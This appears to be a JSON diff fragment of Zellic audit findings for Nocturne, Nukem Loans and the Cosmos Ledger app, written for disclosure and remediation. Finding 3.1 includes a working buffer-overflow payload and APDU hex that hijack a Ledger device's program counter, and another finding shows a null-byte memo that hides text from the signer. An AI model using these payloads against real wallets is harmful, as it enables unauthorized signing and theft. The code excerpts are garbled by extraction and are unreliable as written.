com- mits 50fe52a9 and 84f712da. Zellic Nocturne", + "html_url": "https://github.com/Zellic/publications/blob/master/Nocturne - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Arbitrage opportunities bypass deposit limits", + "labels": [ + "Zellic" + ], + "body": "Target: Handler Category: Business Logic Likelihood: Low Severity: High : High See Finding 3.1 for a description of the security guarantees around the external calls an action in an operation can make. One logical consequence of allowing actions to execute swaps is that they can turn a profit by finding arbitrage opportunities between cycles of Uniswap pools. This is normally alright, but attackers can create larger-than-usual arbitrage opportunities by spending money outside Nocturne. If they do that and then resolve that arbitrage opportunity inside the protocol using an action, they have effectively made a deposit that bypasses the deposit limits and the screener-signature requirement. If an attacker works with an Ethereum block builder, they can create an arbitrage op- portunity immediately before the bundle gets processed by intentionally imbalancing a chosen cycle of Uniswap pools. For example, if they choose tokens A, B, and C, they can use the A/B pool to trade A for B, and then use the B/C and C/A pools together to trade B for A. The former pool will have an inflated quantity of A and a scarcity of B, and the latter pair of pools will have an inflated quantity of B and a scarcity of A. The process can be repeated until all the funds have been spent on imbalancing the pool (or, a sufficiently large flash loan can be taken out so that all the funds the attacker wishes to \u201cdeposit\u201d are spent imbalancing the pool in one or a few cycles \u2014 this saves gas). Then, after the arbitrage opportunity is set up outside Nocturne, they execute a swap inside Nocturne rebalancing that cycle and extracting most of the funds they spent on imbalancing the pool, minus fees. Those funds are then added as refund notes, bypassing deposit limits and the screener-signature requirement. An attacker must work with a block builder to execute this type of deposit because otherwise there is a significant risk of losing the funds to an arbitrage bot. Safely check the total value of the assets before and after an action that does a swap, and reject the swap as unsafe if the increase in total value exceeds a threshold. If this Zellic Nocturne check is done on-chain (and bundle submission is still permissionless), care must be taken so that the oracle cannot also be manipulated. This issue has been acknowledged by Nocturne. Zellic Nocturne", + "html_url": "https://github.com/Zellic/publications/blob/master/Nocturne - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Bundler calls can be identified by MEV bots and front-run", + "labels": [ + "Zellic" + ], + "body": "Target: Teller Category: Protocol Risks Likelihood: Low Severity: Low : Low Since being a bundler is permissionless, anyone can call Teller.processBundle to sub- mit any valid bundle of operations. When submitting a bundle, the bundler pays for the gas spent in both verifying the proofs and executing the actions via Ethereum transaction fees. During the transaction, it then gets reimbursed for that gas via a transfer of unwrapped assets earmarked for gas. However, this presents a perverse economic incentive for MEV-aware Ethereum block builders. Before including a processBundle transaction from a benign bundler in an Ethereum block, if a block builder simulates the transaction, they will find that if they front-run the transaction with an identical transaction sent from their own ad- dress instead, the transaction will happen in the same way, except they pay the gas cost and then they are paid the gas refund instead of the bundler. Doing this would cause the real bundler\u2019s transaction to revert, but the real bundler still pays the gas for verifying the proofs. In processBundle, function processBundle( Bundle calldata bundle ) { external override whenNotPaused nonReentrant onlyEoa returns (uint256[] memory opDigests, OperationResult[] memory opResults) Operation[] calldata ops = bundle.operations; /) ---)) snip ---)) (bool success, uint256 perJoinSplitVerifyGas) = _verifyAllProofsMetered( Zellic Nocturne ops, opDigests ); require(success, \u201dBatch JoinSplit verify failed\u201d); uint256 numOps = ops.length; opResults = new OperationResult[](numOps); for (uint256 i = 0; i < numOps; i+)) { try _handler.handleOperation( ops[i], perJoinSplitVerifyGas, msg.sender ) returns (OperationResult memory result) { /) ---)) snip ---)) Note that first, a call to _verifyAllProofsMetered occurs, which expensively verifies the proofs and measures the gas required, setting perJoinSplitVerifyGas. Next, the call to handleOperation calls _processJoinSplitsReservingFee, which checks the nul- lifiers. This is what reverts in a second call, because the nullifiers will already have been used. This means that, from a MEV-seeking block builder\u2019s perspective, if they front-run the bundler\u2019s transaction, they will still be paid for the gas price of verifying the proof. They need to pay it in their transaction, but the real bundler\u2019s reverted transaction will repay them about the same amount. So, they profit if they execute this front-run, and the real bundler is not repaid for the gas they spend on the proof verification. Block builders are perversely incentivized to front-run the submission of bundles by bundlers. In a perfect economy, this means all bundlers must work with block builders or else their transactions will be reverted, front-run by the block builder issuing the same transaction, and they will pay for the gas for the verification circuit without any reimbursement. This disincentivizes block builders from building blocks. Check the nullifiers of the joinsplits before checking the proofs so that a repeat sub- mission of the same Operation fails much more cheaply, rendering the front-running of bundle submissions economically unviable. Zellic Nocturne This issue has been acknowledged by Nocturne. Nocturne will ensure that bundlers submit their transactions through Flashbots Protect, which protects against front- running. Zellic Nocturne", + "html_url": "https://github.com/Zellic/publications/blob/master/Nocturne - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Operation with zero joinsplits can be tampered with", + "labels": [ + "Zellic" + ], + "body": "Target: Handler Category: Business Logic Likelihood: Low Severity: Low : Low When an operation is processed in a transaction submitted by a bundler, it can specify an arbitrary sequence of external calls to do. These calls are checked by calculating the digest of the Operation struct and then supplying that digest as a public input into the joinsplit circuits. However, if an operation has zero joinsplits, no joinsplit circuits are verified, and so a bundler can freely change the calls executed. There is not much impact, because if an operation has no joinsplits, no assets are unwrapped, and so the external calls only have access to the assets present in the contract before the operation (in the typical case, no assets). Additionally, if an operation has no joinsplits, there is no way to repay the bundler for gas, so a bundler is disincentivized from including it in the bundle in the first place. However, a user can still submit such an operation, and if they do, the bundler can modify it at will. Disallow operations with no joinsplits. This issue has been acknowledged by Nocturne, and a fix was implemented in commit 50fe52a9. Zellic Nocturne", + "html_url": "https://github.com/Zellic/publications/blob/master/Nocturne - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Centralized pricing arbitrage", + "labels": [ + "Zellic" + ], + "body": "Target: Market Category: Business Logic Likelihood: High Severity: High : High As the protocol uses a combination of automated market maker (AMM) oracles and centralized prices provided in signatures, an arbitrage opportunity may exist that will result in the drainage of pools. function borrow(...))) public virtual returns (uint256 debt_shares) { require( checkSignature(authorizer, market, price, deadline, v, r, s), \u201dinvalid.signature\u201d ); require(authorizer =) _owner, \u201dauthorizer\u201d); require(market =) address(this), \u201dmarket\u201d); require(deadline >) block.timestamp, \u201dexpired\u201d); /) protect against price manipulation require(validatePrice(price, amount), \u201dinvalid.price\u201d); debt_shares = _debt.withdraw(amount, receiver, owner); } } The signatures have a deadline of five minutes and can be constantly polled from off- chain components. A malicious user could continuously poll these signatures, waiting for the increase in price of those tokens, and exploit the price difference between the signed price five minutes ago and the current market price. If the price goes up substantially relative to the price in the signature five minutes ago, there may be an edge case where a user can actually borrow more capital than the price of their collateral. For markets that have high collateralization ratio, this can be especially risky because in addition to that, AMM oracles can be manipulated to a certain extent (limited by validatePrice) in the protocol. Zellic Nukem Loans For some market configurations that have have a 90% collateralization rate and 95% liquidation rate, the delta allowed for the underlying AMM is ~5%. A malicious user constantly polling for signatures would have to wait for one instance of such a price movement in the market in order to execute such an arbitrage. With the current architecture, such attacks will always be possible in case of drastic price movements in the five-minute period. However, the goal here is to make this unlikely, by reducing either maximum collateralization rates or reducing the deadline time period such that the required price movement is almost impossible in the time period. The Nukem team agreed with this finding and decided to lower collateralization rates in existing market configurations. The team plans to add additional mitigations in a future update. Zellic Nukem Loans 3.5 [FIXED] Slippage is set to zero during swap Target: Credit, Collateral Category: Business Logic Likelihood: High Severity: High : High Multiple slippage checks are set to zero when performing a token swap. This is hazardous because it could allow users to trade at 100% slippage rates. swapper.swap(asset_, address(this), receiver, amount, 0); We recommend passing a nonzero slippage parameter for the swap function and mak- ing sure that the user is aware of the slippage rate. This issue was fixed by enforcing a 2% maximum slippage from the reference value of the swap provided by the signed reserves, added in commit 571dbc66. Zellic Nukem Loans 3.6 [FIXED] EIP-712 replayable signature in case of fork Target: EIP712 Category: Business Logic Likelihood: Low Severity: High : High EIP-712 is a standard for the hashing and signing of typed, structured data. The stan- dard code does not allow replaying signatures in case of a fork by default, as it rebuilds the domain separator in case the cached address of the contract and the cached chain ID differ to current values. However, in the case of the project\u2019s implementation, the aforementioned checks are removed. The domain separator will not be updated in case of a fork, and the signature can be replayed. function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) =) _cachedThis &) block.chainid =) _cachedChainId) { return _cachedDomainSeparator; } else { return _buildDomainSeparator(); } } Even though the signatures can be replayed, the impact of this issue is relatively lim- ited due to time constraints, mainly affecting the ERC20Permit implementation, which has direct access to user funds. The other contracts that use EIP-712 for verifying sig- natures do not allow performing actions on behalf of other users, so the impact there is limited to a user\u2019s own actions. We recommend using the default implementation of the EIP-712 standard to remove the possibility of replaying signatures in case of a fork. Zellic Nukem Loans The Nukem team remediated this issue in commit 46abe2cd by always rebuilding the domain separator. Zellic Nukem Loans 3.7 [FIXED] Assure debtors are auctionable Target: Auctions Category: Business Logic Likelihood: Low Severity: Medium : Medium The Auctions contract handles the liquidation of debtors. The groupedLiquidation function is used by the owner of the contract to liquidate multiple debtors at once. However, it does not check that the debtors are auctionable, which means that if the owner of the contract by mistake passes a nonauctionable debtor, the liquidation will still be performed, and the debtors will be left in an inconsistent state. function groupedLiquidation( address market, address[] memory debtors ) external returns (uint256 liquidated, uint256 tip) { require( (_msgSender() =) owner()) |) /) owner attributes[_msgSender()].has(Role.EXECUTE_AUCTION), \u201dauthorizer\u201d ); (liquidated, tip) = IMarket(market).credit().liquidate( debtors, _msgSender() ); emit GroupedLiquidations( market, block.timestamp, debtors, liquidated, tip, _msgSender() ); } Zellic Nukem Loans Since this function is a privileged function, the impact is limited to the owner of the contract. However, it can still lead to an inconsistent state of the debtors, which can lead to further unexpected behavior. We recommend individually checking that each debtor is auctionable before per- forming the grouped liquidation. For example, function groupedLiquidation( address market, address[] memory debtors ) external returns (uint256 liquidated, uint256 tip) { for(uint256 i = 0; i < debtors.length; i+)) { require(isAuctionable(market, debtors[i]), \u201dnot auctionable\u201d); } /) ...)) } The Nukem team fixed this finding in commit 571dbc66 by ensuring every debtor is auctionable. Zellic Nukem Loans 3.8 [FIXED] User\u2019s max collateralization is limited by the size of the market Target: Collateral Category: Business Logic Likelihood: Low Severity: Low : Low Liquidations in the protocol affect the underlying AMM, which may cause more liqui- dations. This is a cascading effect. To counteract this, the worth of user collateral is calculated conservatively (the swap price is calculated as if one liquidation would set off all the liquidations). This works, however it devalues the user collateral, and this effect becomes worse as the market grows relative to the underlying pool. Users risk more collateral for smaller loans and may be able to borrow less than ex- pected. Re-architect the conservative value calculations to only account for positions that a liquidation would actually put at risk. The Nukem team has acknowledged this issue and will put it as an object in their road map once markets start becoming large relative to their underlying pools. Zellic Nukem Loans", + "html_url": "https://github.com/Zellic/publications/blob/master/Nukem Loans - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Buffer overflow in Unicode expansion", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The tx_display_translation function in tx_display.c performs a translation of char- acters from src into characters written to dst. The purpose is to substitute ASCII control characters with their escape sequence equivalents and transform non-ASCII characters into their Unicode escape sequence equivalents. Any trailing whitespace or \u2019@\u2019 characters in src are included in the result if the dst buffer is long enough. Once the translation is complete, the dst buffer is terminated with a null character. The length of the src buffer is denoted by srcLen, and the length of the dst buffer is denoted by dstLen. The function constantly checks the bounds of the dst buffer by running the ASSERT_PTR_BOUNDS macro, which increments a count variable and com- pares it against dstLen: #define ASSERT_PTR_BOUNDS(count, dstLen) \\ count+); \\ if(count > dstLen) { \\ return parser_transaction_too_big; \\ } \\ /) [...))] parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen) { /) [...))] uint8_t count = 0; /) [...))] } However, count is a uint8_t while dstLen is a uint16_t, meaning the pointer bounds Zellic Cosmos Network check will always pass if the lower eight bits of dstLen is 0 regardless of the value of the upper eight bits. A consequence of this potential integer overflow is that Unicode expansions may overflow the dst buffer. Note that there is no need to bypass any stack canary check; there is no reference to the CHECK_APP_CANARY() macro in the tx_display_translation or parser_screenPrint (which calls tx_display_translation) functions. An attacker could potentially exploit the dst buffer overflow to execute arbitrary code and thereby manipulate the text displayed on the screen or sign arbitrary transactions. In an exploit payload, for example, the single '\\xff' byte will be expanded into the six-byte string \u201c\\u00FF\u201d, which allows the attacker to quickly consume count. The following message triggers a crash: {1: [{2: \u201dZZZZ\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff \\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ff\\u00ffABCD\u201d }]} It defines a single screen without any title, and the contents include a lot of bytes that each expand into longer sequences of bytes, until the buffer overflows. The ABCD string at the end ends up overwriting the PC register on the Ledger, making it try to execute code at address 0x44434240 (the last bit on ARM is used to signal ARM or Thumb mode, otherwise it would be ...0x41). Do note that after our payload, the application will also write a single null byte. We are also limited to writing with ASCII values in the range 0x20 to 0x7F as other bytes will be escaped to hex characters. However, it is possible to do a partial overwrite of the original PC value provided that the last byte is a null byte. Zellic Cosmos Network During initial testing, we demonstrated this bug in the Speculos emulator, which runs the target application in QEMU, which has significantly worse security than the Ledger device. Namely, it has an executable stack by default and no address randomization (PIE/PIC). For example, consider the following APDU, which inserts the previously mentioned JSON message: 55020201f7a10181a10278f05a5a5a5ac3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3 bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bf c3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3 bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bf c3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3 bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bf c3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bfc3bf41424344 Entering the APDU would cause the crash in Figure 1 (where the screenshot is from debugging the \u201cNano S\u201d target). Figure 2 shows the backtrace (keep in mind that many functions are inlined). This demonstrates we have control of multiple register values, not just PC. Note again that we do not control all bytes in the payload because non-ASCII bytes get expanded. The easiest exploit path here would be to create some valid transac- tion that contains, for example, a MEMO element at the end that triggers the over- flow, making the app jump straight to the verification routine and immediately sign the transaction without any user input. As long as the validator comes up with the same CBOR data as the Ledger app signed, starting from a given TX, this signature will be accepted. However, jumping to this area is not necessarily easy to do. Some devices may support PIE/PIC, which complicates exploitation. When testing on real Ledger devices, we found that PIC address layout is static for a single appli- cation and even persists across reboots. Fortunately, the address depends on some unknowns such as the number of apps previously installed on the device, their sizes, and so forth. Installing the same app over and over seemed to increase the PIC address in a de- terministic way, but without any means of leaking this address, exploitation seems difficult. But an attacker only has to be lucky once. Zellic Cosmos Network Figure 1: A crafted APDU causes a buffer overflow on a Nano S. Figure 2: We obtain a backtrace from the buffer overflow shown in Figure 1. Zellic Cosmos Network Change the declaration of count to a uint16_t: parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen) { /) [...))] uint8_t count = 0; uint16_t count = 0; /) [...))] } This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 17d26659. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Null-terminated strings enable trickery attacks", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: High Severity: High : High The tx_display_translation function copies the src buffer to dst, incrementing the pointer p each iteration, formatting bytes as desired. However, since the src buffer can contain a null byte, the while loop may be stopped early: parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen) { MEMZERO(dst, dstLen); char *p = src; uint8_t count = 0; uint8_t verified_bytes = 0; while (*p) { utf8_int32_t tmp_codepoint = 0; p = utf8codepoint(p, &tmp_codepoint); /) [...))] } ///)) [...))] } Placing a null byte in a string that gets displayed may hide information. For example, consider the following transaction: data = {1: [{1: 'Chain id', 2: 'my-chain'}, {1: 'Account number', 2: '1'}, {1: 'Sequence', 2: '2'}, {1: 'Address', 2: 'cosmos1ulav3hsenupswqfkw2y3sup5kgtqwnvqa8eyhs', 4: True}, Zellic Cosmos Network {1: 'Public key', 2: '/cosmos.crypto.secp256k1.PubKey', 4: True}, {2: 'PubKey object', 3: 1, 4: True}, {1: 'Key', 2: '02EB DD7F E4FD EB76 DC8A 205E F65D 790C D30E 8A37 5A5C 2528 EB3A 923A F1FB 4D79 4D', 3: 2, 4: True}, {2: 'This transaction has 1 Message'}, {1: 'Message (1/1)', 2: '/cosmos.bank.v1beta1.MsgSend', 3: 1}, {2: 'MsgSend object', 3: 2}, {1: 'From address', 2: 'cosmos1ulav3hsenupswqfkw2y3sup5kgtqwnvqa8eyhs', 3: 3}, {1: 'To address', 2: 'cosmos1ejrf4cur2wy6kfurg9f2jppp2h3afe5h6pkh5t', 3: 3}, {1: 'Amount', 2: '10 ATOM', 3: 3}, {2: 'End of Message'}, {1: 'Memo', 2: 'GG\\0I hereby declare war on Arstotzka!'}, {1: 'Fees', 2: '0.002 ATOM'}, {1: 'Gas limit', 2: \u201d100'000\u201d, 4: True}, {1: 'Hash of raw bytes', 2: '9c043290109c270b2ffa9f3c0fa55a090c0125ebef881f7da53978dbf93f7385', 4: True} ] } The null byte in Memo would conceal the declaration of war from the country signing the transaction on the Ledger device as shown in Figure 3. Figure 3: The declaration of war against Arstotzka is hidden on the Ledger device. In general, important information may be concealed from the signer by inserting a null byte in a field that is displayed. Instead of checking if *p is null, check that we have not consumed the entire src buffer: Zellic Cosmos Network parser_error_t tx_display_translation(char *dst, uint16_t dstLen, char *src, uint16_t srcLen) { MEMZERO(dst, dstLen); char *p = src; uint8_t count = 0; uint8_t verified_bytes = 0; while ()p) { while (p < src + srcLen) { /) [...))] } /) [...))] } This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit fb90358d. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Some bytes are not displayed", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: Medium Severity: High : High When tx_display_translation is encoding the src buffer to dst, any bytes less than 0x0F will be caught in the following branch: if (tmp_codepoint < 0x0F) { for (size_t i = 0; i < array_length(ascii_substitutions); i+)) { if ((char)tmp_codepoint =) ascii_substitutions[i].ascii_code) { *dst+) = '\\)'; ASSERT_PTR_BOUNDS(count, dstLen); *dst+) = ascii_substitutions[i].str; ASSERT_PTR_BOUNDS(count, dstLen); break; } } } /) [...))] However, if the byte is not found in the following ascii_substitutions array, nothing will be written to the buffer: static const ascii_subst_t ascii_substitutions[] = { {0x07, 'a'}, {0x08, 'b'}, {0x0C, 'f'}, {0x0A, 'n'}, {0x0D, 'r'}, {0x09, 't'}, {0x0B, 'v'}, {0x5C, '\\)'}, }; Any 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, or 0x0E bytes in the src buffer will not be represented in the dst buffer, potentially misleading users into signing a transaction they do not expect. Zellic Cosmos Network If the for loop does not find the ASCII substitution character, output it in decimal in \\xNN format: if (tmp_codepoint < 0x0F) { uint8_t found = 1; for (size_t i = 0; i < array_length(ascii_substitutions); i+)) { for (size_t i = 0; i < array_length(ascii_substitutions) |) (found = false); i+)) { if ((char)tmp_codepoint =) ascii_substitutions[i].ascii_code) { *dst+) = '\\)'; ASSERT_PTR_BOUNDS(count, dstLen); *dst+) = ascii_substitutions[i].str; ASSERT_PTR_BOUNDS(count, dstLen); break; } } if (!found) { /) Write out the value as a hex escape, \\xNN count += 4; if (count > dstLen) { return parser_unexpected_value; } snprintf(dst, 4, \u201d\\)x%.02X\u201d, tmp_codepoint); dst += 4; } } /) [...))] This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit fb90358d. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Backslash characters are not escaped", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: Medium Severity: Low : Low The tx_display_translation function is responsible for escaping bytes such as new- lines. The following is a mapping of a byte to the suffix, which is appended after a \u2019\\\u2019 character: static const ascii_subst_t ascii_substitutions[] = { {0x07, 'a'}, {0x08, 'b'}, {0x0C, 'f'}, {0x0A, 'n'}, {0x0D, 'r'}, {0x09, 't'}, {0x0B, 'v'}, {0x5C, '\\)'}, }; The following code performs the escaping that is done using the ascii_substitutions array: if (tmp_codepoint < 0x0F) { for (size_t i = 0; i < array_length(ascii_substitutions); i+)) { if ((char)tmp_codepoint =) ascii_substitutions[i].ascii_code) { *dst+) = '\\)'; ASSERT_PTR_BOUNDS(count, dstLen); *dst+) = ascii_substitutions[i].str; ASSERT_PTR_BOUNDS(count, dstLen); break; } } /) [...))] Because of the if (tmp_codepoint < 0x0F) condition, the 0x5C byte is never substi- tuted with \u201c\\\\\u201d. The backslash character (\u2019\\\u2019, ASCII 0x5C) will never be escaped, meaning two different inputs can have the same canonical, textual representation. For example, consider the following data: Zellic Cosmos Network {1: [ {1:\u201dChain id\u201d, 2: \u201dlol\\)u00FF\\xff\u201d} ]} The display would look as shown in Figure 4. Figure 4: The backslash character is not properly escaped. The \u201cfake\u201d and legitimately escaped strings are indistinguishable on the device. Update the branch logic such that the 0x5C byte is considered for substitution. if (tmp_codepoint < 0x0F) { if (tmp_codepoint < 0x0F |) tmp_codepoint =) 0x5C) { for (size_t i = 0; i < array_length(ascii_substitutions); i+)) { /) [...))] This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 17d26659. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Buffer overflows in ledger-zxlib", + "labels": [ + "Zellic" + ], + "body": "Target: zxformat.h (ledger-cosmos dependency, ledger-zxlib) Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational Though not specifically in scope, while browsing the ledger-zxlib dependency\u2019s source tree, we observed the following potential bugs. In the pageStringHex function, the outValueLen and lastChunkLen variables are uint16_t, meaning their maximum values are 65535 (0xffff): __Z_INLINE void pageStringHex(char *outValue, uint16_t outValueLen, const char *inValue, uint16_t inValueLen, uint8_t pageIdx, uint8_t *pageCount) { /) [...))] const uint16_t lastChunkLen = (msgHexLen % outValueLen); /) [...))] if (pageIdx < *pageCount) { if (lastChunkLen > 0 &) pageIdx =) *pageCount - 1) { array_to_hexstr(outValue, outValueLen, (const uint8_t*)inValue+(pageIdx * (outValueLen/2)), lastChunkLen/2); } else { array_to_hexstr(outValue, outValueLen, (const uint8_t*)inValue+(pageIdx * (outValueLen/2)), outValueLen/2); } } } The last parameter of the array_to_hexstr function is count, which is a uint8_t, mean- ing the lastChunkLen/2 and outValueLen/2 arguments \u2014 both of which have potential maximum values of 32767 (0xffff/2) \u2014 will be cast to uint8_t, which can store a max- imum of 255 (0xff). Though cast truncation is possible here, it would likely not be exploitable since the count controls the number of bytes written to the dst buffer. However, in array_to_hexstr, the following size check also contains an integer over- flow bug: Zellic Cosmos Network __Z_INLINE uint32_t array_to_hexstr(char *dst, uint16_t dstLen, const uint8_t *src, uint8_t count) { MEMZERO(dst, dstLen); if (dstLen < (count * 2 + 1)) { return 0; } const char hexchars[] = \u201d0123456789abcdef\u201d; for (uint8_t i = 0; i < count; i+), src+)) { *dst+) = hexchars[*src >) 4u]; *dst+) = hexchars[*src & 0x0Fu]; } *dst = 0; /) terminate string return (uint32_t) (count * 2); } Any count value greater than 127 ((0xf f \u2212 1)/2) will result in the count \u2217 2 + 1 calcula- tion overflowing, allowing the dst buffer length check to be bypassed and potentially enabling a dst buffer overflow. The pageStringHex function does not appear to be used by ledger-cosmos, so it does not present any immediate risk. Note that the array_to_hexstr function is used once, but has a hardcoded count ar- gument that is not high enough to overflow, so the bugs will not be triggered in this case: char buf[18] = {0}; array_to_hexstr(buf, sizeof(buf), (uint8_t *) &swapped, 8); Add checks to prevent the cast truncation and integer overflow. A fix was added to the zxlib dependency in commit 72bed6ab. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Stack canary is chosen at compile time", + "labels": [ + "Zellic" + ], + "body": "Target: ledger-cosmos Category: Business Logic Likelihood: N/A Severity: Informational : Informational The stack canary (checked using the CHECK_APP_CANARY() macro) is simply a hardcoded value 0xDEAD0031: #define APP_STACK_CANARY_MAGIC 0xDEAD0031 #pragma clang diagnostic push #pragma ide diagnostic ignored \u201dEndlessLoop\u201d void handle_stack_overflow() { zemu_log(\u201d!!!!!!!!!!!!!!!!!!!!!! CANARY TRIGGERED!!! STACK OVERFLOW DETECTED\\n\u201d); #if defined (TARGET_NANOS) |) defined(TARGET_NANOX) |) defined(TARGET_NANOS2) io_seproxyhal_se_reset(); #else while (1); #endif } #pragma clang diagnostic pop __Z_UNUSED void check_app_canary() { #if defined (TARGET_NANOS) |) defined(TARGET_NANOX) |) defined(TARGET_NANOS2) if (app_stack_canary !) APP_STACK_CANARY_MAGIC) handle_stack_overflow(); #endif } /) [...))] An attacker can predict the value and potentially exploit buffer overflow vulnerabili- ties, bypassing this check. Zellic Cosmos Network While the canary may help detect accidental buffer overflows, it provides little miti- gation against intentional buffer overflow exploits. Consider choosing a random stack canary at runtime for additional safety. This issue has been acknowledged by Cosmos Network. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Pointer bounds assertion after write leads to buffer over- flow", + "labels": [ + "Zellic" + ], + "body": "Target: tx_display.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The ASSERT_PTR_BOUNDS macro increments count then checks that the count is within the bounds of the buffer: #define ASSERT_PTR_BOUNDS(count, dstLen) \\ count+); \\ if(count > dstLen) { \\ return parser_transaction_too_big; \\ } \\ However, the assertion is always placed after writing a byte (i.e., the code writes be- fore checking the bounds), potentially causing a buffer overflow. A one-byte buffer overflow would likely be unexploitable. Ideally the tx_display_tr anslation function would return the parser_transaction_too_big error and cause the destination buffer to be unused, but the return value is unused per Finding 3.10. Check that the buffer is large enough (that the pointer is in bounds) before writing each byte. This issue has been acknowledged by Cosmos Network, and a fix was implemented in commit 17d26659. Zellic Cosmos Network", + "html_url": "https://github.com/Zellic/publications/blob/master/Cosmos SDK Sign Mode Textual - Zellic Audit Report.pdf" + }, + { + "title": "3.8 Exception handler variables missing volatile keyword", + "labels": [ + "Zellic" + ], + "body": "Target: crypto.c, apdu_handler.c (ledger-cosmos) Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational Per Ledger, one of the common pitfalls is in the exception handling. Their recommen- dation is When modifying variables within a try / catch / finally context, always declare those variables volatile. This will prevent the compiler from making invalid as- sumptions when optimizing your code because it doesn\u2019t understand how our exception model works. Ledger has implemented exception handling through OS support, using os_longjmp to jump to magic addresses that the OS intercepts and translates. This is not very transparent to an optimizing compiler and could turn into a compile-time mistake if the code is not handling it. The examples mentioned in the troubleshooting guide are for changing the status of an error object during the catch context, then emitting it during finally or using it later. The same code pattern emerges in a few places in the ledger-cosmos repository. For example, crypto.c variable err: zxerr_t crypto_extractPublicKey(const uint32_t path[HDPATH_LEN_DEFAULT], uint8_t *pubKey, uint16_t pubKeyLen) { cx_ecfp_public_key_t cx_publicKey; cx_ecfp_private_key_t cx_privateKey; uint8_t privateKeyData[32]; if (pubKeyLen < PK_LEN_SECP256K1) { return zxerr_invalid_crypto_settings; } zxerr_t err = zxerr_ok; Zellic Cosmos Network BEGIN_TRY { TRY { os_perso_derive_node_bip32(CX_CURVE_256K1, path, HDPATH_LEN_DEFAULT, privateKeyData, NULL); cx_ecfp_init_private_key(CX_CURVE_256K1, privateKeyData, 32, &cx_privateKey); cx_ecfp_init_public_key(CX_CURVE_256K1, NULL, 0, &cx_publicKey); cx_ecfp_generate_pair(CX_CURVE_256K1, &cx_publicKey, &cx_privateKey, 1); } CATCH_OTHER(e) { err = zxerr_ledger_api_error; } FINALLY { MEMZERO(&cx_privateKey, sizeof(cx_privateKey)); MEMZERO(privateKeyData, 32); } } END_TRY; if (err !) zxerr_ok) { return err; } /) More code here apdu_handler.c variable sw: void 